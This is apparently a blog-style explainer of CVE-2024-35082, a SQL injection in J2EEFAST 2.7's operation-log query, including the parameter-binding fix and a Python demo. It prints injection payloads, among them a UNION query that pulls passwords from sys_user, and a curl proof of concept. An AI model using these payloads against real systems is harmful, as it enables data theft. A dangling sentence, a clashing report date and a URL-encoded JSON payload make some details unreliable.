In June 2024, cybersecurity researchers reported a high-impact SQL injection vulnerability affecting the popular Java-based management framework J2EEFAST, version 2.7. Tracked as CVE-2024-35082, the flaw sits in the findPage query within SysOperLogMapper.xml, which retrieves and filters operation logs from the application's database.
This post will break down how the vulnerability works, demonstrate potential exploits, and provide references for deeper reading. Everything is kept in simple language for easy understanding.
What is J2EEFAST?
J2EEFAST is a widely used rapid development platform built on Java. It's used mostly to build admin portals and workflow management systems. Its popularity means a vulnerability here could impact thousands of organizations worldwide.
Details of CVE-2024-35082
In short: the findPage query inside SysOperLogMapper.xml splices a user-supplied parameter straight into the SQL text (MyBatis `${}` substitution) instead of binding it as a query parameter. An attacker can exploit this to run arbitrary SQL code, which could:
Where's the Vulnerability?
The problem sits in the following XML file: SysOperLogMapper.xml. This file defines queries for log searching, and it takes "search filters" directly from HTTP parameters.
Here's a simplified example of what the vulnerable code looks like:

```xml
<select id="findPage" resultMap="BaseResultMap">
SELECT * FROM sys_oper_log
<where>
<if test="params.keyword != null and params.keyword != ''">
AND oper_name LIKE '%${params.keyword}%'
</if>
</where>
</select>
```
How Could This Be Exploited?
Suppose the application provides a search box where users can search logs by "Operator Name." The request might look like:
```http
POST /sys/operLog/page
Content-Type: application/json

{
  "params": {
    "keyword": "alice"
  }
}
```
But an attacker could instead submit:

```json
{
  "params": {
    "keyword": "' OR 1=1 -- "
  }
}
```
This would turn the real query into:

```sql
SELECT * FROM sys_oper_log WHERE oper_name LIKE '%' OR 1=1 -- %'
```

This returns every record in the table: 1=1 is always true, and the trailing `--` comments out the rest of the original query.
More Dangerous Exploits
A skilled hacker could go further, for example performing a UNION injection to leak data from other tables:
```json
{
  "params": {
    "keyword": "' UNION SELECT user(),password,NULL,NULL,NULL FROM sys_user -- "
  }
}
```
If the database account the application connects with has write privileges, the attacker could do even more damage, such as updating records or dropping tables.
Here's a ready-to-use, simple PoC (using curl):

```bash
curl -X POST "http://target-site/sys/operLog/page" \
-H "Content-Type: application/json" \
-d '{"params":{"keyword":"%27%20OR%201=1%20--%20"}}'
```
If the vulnerability is present, you'll get back every operation log in the system.
Original References
- NVD Entry for CVE-2024-35082
- J2EEFAST Gitee Repository
The Fix
The patched mapper binds the keyword as a query parameter with `#{}` instead of splicing it into the SQL text with `${}`, so the value can never change the structure of the statement:

```xml
AND oper_name LIKE CONCAT('%', #{params.keyword}, '%')
```
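To see why the `#{}` fix works, the following added example (not J2EEFAST code) emulates both mapper variants in Python against an in-memory SQLite table with a constructed stand-in for sys_oper_log: text substitution lets the `' OR 1=1 -- ` keyword from above rewrite the query, while parameter binding treats the same keyword as a harmless literal. The table name and columns are assumptions for illustration; the `||` operator stands in for MySQL's CONCAT.

```python
import sqlite3

# Constructed sample rows standing in for sys_oper_log (not the real J2EEFAST schema).
ROWS = [
    ("alice", "login"),
    ("bob", "delete user"),
    ("carol", "export"),
]


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_oper_log (oper_name TEXT, title TEXT)")
    conn.executemany("INSERT INTO sys_oper_log VALUES (?, ?)", ROWS)
    return conn


def find_page_interpolated(keyword):
    """Mimics MyBatis ${} substitution: the keyword is spliced into the SQL text,
    so quotes, OR and -- in the keyword become part of the statement."""
    sql = f"SELECT oper_name FROM sys_oper_log WHERE oper_name LIKE '%{keyword}%'"
    return sorted(r[0] for r in _db().execute(sql))


def find_page_bound(keyword):
    """Mimics MyBatis #{} binding (the CVE-2024-35082 fix): the keyword travels to the
    driver as a separate parameter and is only ever compared as a string value."""
    sql = "SELECT oper_name FROM sys_oper_log WHERE oper_name LIKE '%' || ? || '%'"
    return sorted(r[0] for r in _db().execute(sql, (keyword,)))


if __name__ == "__main__":
    payload = "' OR 1=1 -- "
    print("interpolated, normal search:", find_page_interpolated("alice"))
    print("interpolated, payload:      ", find_page_interpolated(payload))
    print("bound, normal search:       ", find_page_bound("alice"))
    print("bound, payload:             ", find_page_bound(payload))
    # Caveat: binding stops injection but does not neutralise LIKE wildcards;
    # a keyword of "%" still matches every row. That is a search-semantics
    # question, not a SQL injection, and needs separate escaping if it matters.
    print("bound, wildcard:            ", find_page_bound("%"))
```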
Final Thoughts
CVE-2024-35082 is a classic example of how a simple coding mistake can lead to a serious security issue. Never trust user input; always use safe parameter binding. If you are running J2EEFAST, please patch your system as soon as possible.
For security professionals: test all application inputs, especially search and filter parameters, for similar SQL injection vulnerabilities.
Stay safe and always sanitize your inputs!
Timeline
Published on: 05/23/2024 17:15:30 UTC
Last modified on: 11/08/2024 16:35:10 UTC